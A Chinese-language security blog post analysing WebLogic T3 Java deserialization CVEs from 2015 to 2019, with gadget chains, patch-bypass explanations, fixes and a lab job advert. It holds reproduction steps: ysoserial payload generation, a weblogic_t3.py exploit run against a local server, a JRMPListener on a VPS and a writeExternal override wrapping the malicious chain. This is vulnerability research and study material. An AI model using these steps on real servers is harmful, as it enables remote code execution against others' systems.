fastjson 序列化 不包括转义字符_Weblogic T3 反序列化历史漏洞

小编注

   本文是osword同学的Java安全学习笔记之一,将详细分析Weblogic历史,从CVE-2015至CVE-2019相关历史漏洞入手,记录学习Java反序列化漏洞的心得

CVE-2015-4852

影响版本

Oracle WebLogic Server 12.2.1.0

Oracle WebLogic Server 12.1.3.0Oracle WebLogic Server 12.1.2.0Oracle WebLogic Server 10.3.6.0

漏洞原理

测试环境:10.3.6.0 jdk7u21 debian

利用t3协议通信反序列化CC链,简化栈如下。

InboundMsgAbbrev.readObject() -> ... -> AnnotationInvocationHandler.readObject() -> AnnotationInvocationHandler.invoke() -> LazyMap.get() -> .... -> Runtime.exec()

漏洞复现

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" > "/tmp/tm.ser"python weblogic_t3.py 127.0.0.1 7001 /tmp/tm.ser

46fb22d4f62daf78bbd07d94bc76cd92.png

漏洞分析

关注反序列化中间过程,利用 LazyMap链进行反序列化,载体套用AnnotationInvocationHandler类,this.memberValues可控为LazyMap类。利用代理机制,在执行entrySet方法使用会优先执行invoke方法

5579350935698cf17db12b105e4fa416.png

接着触发LazyMap.get方法,this.factory可控Chained-Transformer类,最后反射执行Runtime.getRuntime.exe-c('xxx').

4ed6716a5df3179d8b092944be0a7604.png

漏洞修复

resolveClass拦截反序列化的类,将org.apache.comm-ons.collections.functors添加进黑名单。应用位置如下

weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStreamweblogic.rjvm.MsgAbbrevInputStream.classweblogic.iiop.Utils.class

CVE-2016-0638

影响版本

Oracle WebLogic Server 12.2.1.0

Oracle WebLogic Server 12.1.3.0

Oracle WebLogic Server 12.1.2.0

Oracle WebLogic Server 10.3.6.0

漏洞原理

测试环境:10.3.6.0 jdk7u21 debian

利用StreamMessageImpl封装的CommonsCollecti-ons1恶意利用链,使恶意类反序列化在StreamMessageI-mpl.readExternal中进行,不在weblogic.rjvm.Inbo-undMsgAbbrev.class :: ServerChannelInputStream中反序列化,以此绕过补丁

漏洞复现

重写writeExternal类,以此构造出符合readExternal反序列化的数据流。exp.getObject就是CommonsCollecti-ons1最终构造的对象。如下图,执行弹个计算器。

ff453233cb138a4929f9e7c57c6bc466.png

漏洞分析

StreamMessageImpl.readExternal中调用readObject反序列化数据流.针对var1反序列化的条件有

  1. 判断读取的第一个字节是否为1

  2. PayloadFactoryImpl.ceatePaload方法中需要读取到var1(恶意类数据流)的长度.

dc67c398ba7d058e37d31f9744a23d19.png

所以依据此我们可以进行StreamMessageImpl.write-External进行重写.

var3.writeObject(exp.getObject()); // 传入CommonsCollections1var1.writeByte(1); // 第一个字符写入字符1var1.writeInt(var5.length); // 写入恶意类数据流长度

a6b069a5c12b6776198064f3329aaba7.png

CVE-2016-3510

影响版本

Oracle WebLogic Server 12.2.1.0Oracle WebLogic Server 12.1.3.0Oracle WebLogic Server 12.1.2.0Oracle WebLogic Server 10.3.6.0

漏洞原理

MarshalledObject调用构造方法中存在序列化操作,且该对象中存在readResolve方法能够在反序列化时被调用且反序列化数据流可控.

漏洞复现

eafe7254b13dfb41db10d66323307046.png

漏洞分析

跟进MarshalledObject.readResolve方法.其中对this.objBytes调用readObject方法反序列化

43af81cdf920444855b1885cd30d9238.png

回溯如何构造this.objBytes,发现是在创建Marsha-lledObject对象时候,可以直接插入恶意类生成序列化数据流

d807dd4cdba32cb70f5bb21ffe7aba42.png

CVE-2019-2890

影响版本

WebLogic Server 10.3.6.0WebLogic Server 12.1.3.0WebLogic Server 12.2.1.3

漏洞原理

PersistentContext在序列化时候能够写入恶意类对象,在反序列化时PersistentContext对象调用readObject时对PersistentContext封装的序列化对象再次反序列化,可以绕过黑名单的限制

漏洞复现

测试环境:10.3.6.0 + jdk7u21

1.vps开启JRMPListener

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "open /System/Applications/Calculator.app"

2. T3协议利用

python weblogic_t3.py 127.0.0.1 7001 /tmp/cve-2019.2890.ser

23d7df556aab3c09359b5041efb5b4d1.png

漏洞分析

该分析主要针对,由于直接复制PersistentContext类进行构造,中间会出现一些问题

  • 实例化对象时会调用SecurityServiceManager.i-sKernelIdentity进行判断,由于不影响writeO-bject对象创建直接注释掉即可.

c4e3236b8570e109534faf58e517cf7c.png

  • 获取KERNEL_ID时候,网上师傅的文章发现生成序列化时候卡住,在调试时并没有出现该情况.测试的版本在调用SubjectManager.getSubject-Manager方法代码如下.

b612fc22d469ecff9e99a8bb422987a8.png

83080fe051039160cd870a3d433ed9f4.png

  • 在反序列化时,需要进行解密。所以在调用writeSubjec写入时需要执行EncryptionUtil.e-ncrypt对数据流进行加密.且加密条件需要本机的SerializedSystemIni.dat文件

9a72c0165ade88c294e74995cf5708a4.png

漏洞修复

resolveClass中验证反序列化类是否为Subject子类

CVE-2017~CVE-2018

CVE-2017至2018更多是替换恶意类绕过补丁,不再赘述。

CVE-2017-3248

MarshalledObject+JRMP

Apache Commons Colletions基础漏洞修复,与CVE-2016-3510利用相同不过恶意类替换为JRMP,利用java.rmi.registry.Registry.

CVE-2018-2628

MarshalledObject+JRMP

java.rmi.registry.Registry替换为java.rmi.activation.Ac-tivator,绕过resolveProxyClass判断

CVE-2018-2893

CVE-2017-0638 + CVE-2017-3248即StreamMessageImpl中封装JRMPClient

结语

  1. Weblogic利用T3协议反序列化,大多数是利用类封装恶意类绕过补丁(resolveClass).

  2. 在构造恶意类时可以重写writeObject/write-External方法.需要传入恶意类数据流的长度

  3. 关于JRMP类可以实现自己打自己可以参考链接:https://xz.aliyun.com/t/7079

  4. IDEA中进行低版本编译File->Project Structure->Project language level中选择

参考链接

1. https://www.jianshu.com/p/38033935a914

2. https://www.cnblogs.com/afanti/p/10240232.html

3. https://paper.seebug.org/333/

4. https://xz.aliyun.com/search?keyword=weblogic

5. https://www.cnblogs.com/afanti/p/10240232.html

429db7c1b2889c7600005a922e499949.gif

逐日实验室  招兵买马

二进制安全研究员(偏Pwn方向)   校招、实习、社招

base:杭州

岗位职责

1. 重大Windows漏洞应急

2. 分析Crash样本和软件漏洞,编写漏洞利用代码
3. 前沿技术研究,落地产品demo岗位要求1. 熟悉X86/X64的汇编语言,有一定的逆向能力
2. 熟悉常见的二进制漏洞及利用方式
3. 熟悉OD、IDA、WINDBG等调试工具
4. 能够编写Windows历史漏洞EXP
5. 有技术洞察力,对安全技术研究有热爱,对研究前沿技术感兴趣
6. 获得过国际或者国内重大CTF比赛名次者优先加分项:
1. 对Windows系统有较深入了解者优先

二进制安全研究员(偏Re方向)   校招、实习

base:杭州

岗位职责
1. 对在野的APT或包含CVE利用的恶意样本进行跟踪分析
2. 恶意软件攻防,对反病毒以及反反病毒进行深入研究
3. 前沿技术研究,落地能增强产品安全能力的demo岗位要求
1. 有基本的代码功底以及较为熟练的逆向能力
2. 熟练掌握调试工具的使用,熟悉常用的调试技巧
4. 熟悉windows/Linux平台,了解操作系统的基本工作原理
5. 熟悉Windows/Linux平台下常见的恶意软件攻防手段
6. 有技术洞察力,对安全技术研究有热爱,对研究前沿技术感兴趣加分项:
1.  对著名的恶意软件有过完整的实战分析
2.  对内核攻防有了解
3.  了解主流的安全产品对恶意行为的检测原理
4.  参与过知名安全工具的开发或了解过其实现原理

Web 安全研究员   校招、实习

base:杭州

岗位职责
1. 前沿攻防技术研究
2. 参与红蓝对抗任务
3. 企业安全产品赋能岗位要求
1. 熟悉渗透测试的一般流程和技巧,有过实战经验(包括src、众测、护网等)
2. 熟悉php/python/java等任意一门语言的代码审计
3. 至少熟练掌握一门开发语言
4. 具有独立的漏洞挖掘、研究能力
5. 有技术洞察力,对安全技术研究有热爱,对研究前沿技术和攻防对抗感兴趣
6. 获得过国际或者国内重大CTF比赛名次者优先加分项:
1. 熟悉内网渗透,具有大型、复杂网络环境的内网渗透经验
2. 拥有常见安全产品绕过经验,如WAF、IDS等

递送简历邮箱:fangyuan@moresec.cn 

投递格式:姓名+岗位+来自逐日公众号 ▼ 逐日干货 ▼ CVE-2020-13921 Apache SkyWalking SQL注入漏洞分析

Edge CVE-2017-0234 漏洞复现与利用

从几种主动防御场景看MITRE Shield中的欺骗之道

某APT组织样本及其利用OFFICE漏洞分析

CVE-2020-14364 QEMU逃逸漏洞分析(含完整EXP)

47cd147904de180dde1459bc37e0ab05.png

逐日实验室,寓意为追逐技术永不停歇,是默安科技安全研究院下的一支团队。专注于信息安全攻防研究,包括漏洞挖掘、逆向工程、红蓝对抗、代码审计、产品赋能等方向。

0b231ebf94d6ca57cea8f79b0159fcae.png   逐日实验室 长按左侧二维码 获取更多安全资讯点击这里获取所有POC
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值